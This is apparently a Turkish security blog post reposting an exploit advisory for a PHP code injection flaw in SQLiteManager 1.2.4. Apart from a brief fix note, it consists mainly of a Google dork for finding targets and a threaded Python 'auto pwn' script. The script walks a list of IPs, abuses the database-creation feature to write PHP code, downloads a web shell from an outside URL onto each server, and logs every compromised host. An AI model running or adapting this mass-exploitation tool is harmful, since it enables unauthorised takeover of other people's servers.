admin | 25 Ocak 2013
No comments

SQLiteManager 1.2.4 Remote PHP Code Injection Vulnerability

SQLiteManager 1.2.4 Remote PHP Code Injection injection açığı bulunmuştur. Açık sayesinde PHP Shell upload edilebilmekte, servere full erişim hakkı elde edilebilmektedir. Açığın oluşum yeri, açık hakkındaki açıklamalar, ve exploit şu şeklilde;

Description:
===============================================================
Exploit Title: SQLiteManager 0Day Remote PHP Code Injection Vulnerability
Google Dork: intitle:SQLiteManager inurl:sqlite/
Date: 23/01/2013
Exploit Author: RealGame
Vendor Homepage: http://www.Relagame.co.il
Software Link: http://sourceforge.net/projects/sqlitemanager/
Version: <=1.2.4
Tested on: Windows XP, Debian 2.6.32-46
CVE: N/A
===============================================================
Vulnerable Softwares:
 
Name: SQLiteManager
Official Site: http://www.sqlitemanager.org/
 
Name: Ampps
Official Site: http://www.ampps.com/
 
Name: VertrigoServ
Official Site: http://vertrigo.sourceforge.net/
===============================================================
About Software:
Official Site: http://www.sqlitemanager.org/
SQLiteManager is a database manager for SQLite databases. You can manage
any SQLite database created on any platform with SQLiteManager.
===============================================================
Easy Way To Fix:
Find: SQLiteStripSlashes($_POST['dbpath'])
Replace: str_replace('.', '', SQLiteStripSlashes($_POST['dbpath']))
On File: ./include/add_database.php
===============================================================
 
import re
import urllib2
from urllib import urlencode
from sys import argv, exit
from time import sleep
from threading import Thread, activeCount
from socket import setdefaulttimeout
 
def strip_tags(value):
#Strip tags with RegEx
return re.sub('<[^>]*?>', '', value)
 
def writeLog(log, msg):
log.write(msg + '\r\n')
log.flush()
print msg
 
def getTextFile(txt):
return txt.read().replace('\r', '').split('\n')
 
def getUrl(ip):
urlOptions = ['/sqlite/','/sqlitemanager/','/']
for option in urlOptions:
url = 'http://' + ip + option
try:
htmlRes = urllib2.urlopen(url, None, 120).read()
if "SQLiteManager" in htmlRes:
return url
#Not Responding Error
except Exception:
continue
return None
 
def getDbId(url, myDbName):
#Find Components
htmlRes = urllib2.urlopen(url, None, 120).read()
if htmlRes:
#If you found it take all the rows
td = re.findall('<td class="name_db">(.*?)</td>', htmlRes, re.DOTALL)
#Make a dict of stripped columns
for element in td: 
if strip_tags(element) == myDbName:
#Return Id
return "".join(re.findall('\?dbsel=(.*?)"', element, re.DOTALL))
return None
 
def getOs(information):
information = str(information).lower()
if "win32" in information:
return "Win32"
else:
return "Linux / MacOSX"
 
def pwnIt(ip, activity, success):
writeLog(activity, 'Now: %s' % ip)
url = getUrl(ip)
if not url:
writeLog(activity, 'Error: %s sqlite not found' % ip)
return
 
myDbName  = "sqlphp"
myDbFile  = "sql.php"
shellName = "right.php"
if len(argv) == 3:
shellUrl  = argv[2]
else:
shellUrl  = "http://garr.dl.sourceforge.net/project/c37-shell/C37-1.3.php"
#Create Database
params = {'dbname'      : myDbName,
'dbVersion'   : '2',
'dbRealpath'  : None,
'dbpath'      : myDbFile,
'action'      : 'saveDb'}
res = urllib2.urlopen(url + "main.php", urlencode(params), 120)
#Get Operation System
opSystem = getOs(res.info())
#Get Database ID
dbId = getDbId(url + "left.php", myDbName)
#If Database Created
if dbId:
#Create Table + Shell Creator
params = {'DisplayQuery'    : 'CREATE TABLE temptab ( codetab text );\n' + \
'INSERT INTO temptab VALUES (\'<?php $destination=fopen("%s","w");$source=fopen("%s","r");while ($a=fread($source,1024)) fwrite($destination,$a);fclose($source);fclose($destination);?>\');\n' %(shellName, shellUrl),
'sqlFile'         : None,
'action'          : 'sql',
'sqltype'         : '1'}
urllib2.urlopen(url + "main.php?dbsel=%s&table=temptab" %dbId, urlencode(params), 120)
#Create Shell
urllib2.urlopen(url + myDbFile, None, 120)
#Remove Database
urllib2.urlopen(url + "main.php?dbsel=%s&table=&view=&trigger=&function=&action=del" %dbId, None, 120)
#Update Log
writeLog(success, 'Succces: %s - OS: %s' % (url + shellName, opSystem))
return
 
writeLog(activity, 'Fail: %s' % ip)
 
def main():
if len(argv) < 2:
filename = argv[0].replace('\\', '/').split('/')
filename = filename[-1]
 
print \
'SQLiteManager Auto Pwn\n' + \
'Made By TzAnAnY\n\n' + \
'Execute Example: ' + filename + ' ips.txt\n' + \
'Another Example: ' + filename + ' ips.txt FileURL\n' + \
'ips.txt -> File with ip:port(Filtered)\n' + \
'FileURL -> The Shell File URL\n' + \
'All Activity logs on Activity.log\n' + \
'All Success logs on Success.log'
exit()
 
ips = getTextFile(open(argv[1], 'r'))
success = open('Success.log', 'a+b')
activity = open('Activity.log', 'a+b')
#Set Socket Time Out
setdefaulttimeout(120)
 
for ip in ips:
Thread(target=pwnIt, args=(ip, activity, success)).start()
while activeCount() >= 10:
sleep(1)
 
if __name__ == '__main__':
main()
 
# 93238C8D66448B3F   1337day.com [2013-01-26]   1F04097D9EC01067 #

Bir önceki yazımız olan ImageCMS 4.0.0b Multiple Vulnerabilities başlıklı makalemizde Image CMS Açıkları ve ImageCMS SQL injection hakkında bilgiler verilmektedir.

Category: Genel | Tags: ,

Bir Cevap Yazın